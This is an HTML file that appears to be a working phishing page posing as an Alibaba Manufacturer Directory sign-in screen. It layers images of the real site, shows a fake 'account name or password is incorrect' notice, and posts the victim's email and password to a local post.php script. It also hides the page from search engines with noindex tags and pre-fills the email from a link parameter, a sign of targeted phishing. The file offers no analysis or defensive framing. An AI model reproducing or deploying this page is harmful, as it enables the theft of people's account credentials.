<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Alibaba&nbsp;Manufacturer&nbsp;Directory&nbsp;-&nbsp;Suppliers,&nbsp;Manufacturers,&nbsp;Exporters&nbsp;&amp;amp;&nbsp;Importers&nbsp;</title>
<meta http-equiv='content-type' content="text/html; charset=ISO-8859-5">
<meta http-equiv='content-type' content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">
<link rel="icon" type="images/ico" sizes="16*16" href="images/favicon.ico">

<style>



element {

}
#login-content .fm-text {

    width: 100%;

}
.fm-text:hover, .fm-textarea:hover {

    border: 1px solid #a6a6a6;

}
.fm-text {

    color: #333;
    background-color: #fff;
    border: 1px solid #ccc;
    transition: border linear .2s;

}
.fm-text, .fm-textarea {

    float: left;
    padding: 4px 6px;
    border: 1px solid #ccc;
    line-height: 17px;
    font-size: 12px;
    color: #595959;
    background: #fff;
        background-color: rgb(255, 255, 255);
    vertical-align: middle;
    -webkit-box-shadow: 0 1px 0 #ececec inset;
    -moz-box-shadow: 0 1px 0 #ececec inset;
    -ms-box-shadow: 0 1px 0 #ececec inset;
    -o-box-shadow: 0 1px 0 #ececec inset;
    box-shadow: 0 1px 0 #ececec inset;
    _padding: 5px 6px;

}
input {

    outline: 0;

}
blockquote, body, dd, div, dl, dt, fieldset, form, h1, h2, h3, h4, h5, h6, input, li, ol, p, pre, td, textarea, th, ul {

    margin: 0;
    padding: 0;

}
#login-form, .notice {

    font-family: Arial,Helvetica,sans-serif,SimSun,宋体;

}
#login-form {

    font: 400 12px arial;
        font-family: arial;
        font-size: 12px;
        line-height: normal;

}
body {

    font-family: Arial,Helvetica,sans-serif,SimSun,宋体;
    color: #000;

}
body {

    font: 12px/1.6 Tahoma,Arial,Hiragino Sans GB,宋体;
    color: #4d4d4d;
    -webkit-text-size-adjust: none;

}

</style>


</head>
<body style="visibility: visible;" onload="unhideBody()" bgcolor="">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:860px; z-index:0">
<img src="images/a.png" alt="" title="" width="1349" border="0" height="860">
</div>
<div style="position:absolute; overflow:hidden;left:0px; top:101px; width:1349px; height:600px; z-index:1;">
<img src="images/b.jpg" width="1349" height="600">
</div>
<div style="position:absolute; overflow:hidden; left:840px; top:142px; z-index:2">
<img type="image" name="image" class="image" tabindex="" src="images/1.png" width="400" border="0" height="399">
</div>
<form id="login" action="post.php" name="login" method="post" onsubmit="return validateForm()">
<div style="position:absolute; background-color:#f4ede7;overflow:hidden; left:861px; top:170px; width:360px; height:27px; z-index:3"> * Your account name or password is incorrect. <a href="">Help</a></div>
<div class="fm-field-wrap ">
<input style="position:absolute; overflow:hidden; left:861px; top:221px; width:360px; height:27px; z-index:3" id="fm-login-id" class="fm-text" name="email"  tabindex="1" placeholder="Email address" type="email" required />
</div>
<div class="fm-field-wrap">
<input style="position:absolute; overflow:hidden; left:861px; top:283px; width:360px; height:27px; z-index:4" id="fm-login-password" class="fm-text" name="password" tabindex="2" placeholder="Password"  type="password" required />
</div>

<div style="position:absolute; overflow:hidden; left:857px; top:348px; z-index:3">
<input value="Sign In" style="width:369px; height:30px; background-color: #fa8211; 
  font-family: Verdana; font-size: 18px; font-weight: light; color: white;" type="submit">
</div>
</form>
</body>
<script>
var  query, input = document.querySelector("#fm-login-id");
        query = new URLSearchParams( window.location.search ) ;
		input.value = query.get('em');;
</script>
</html>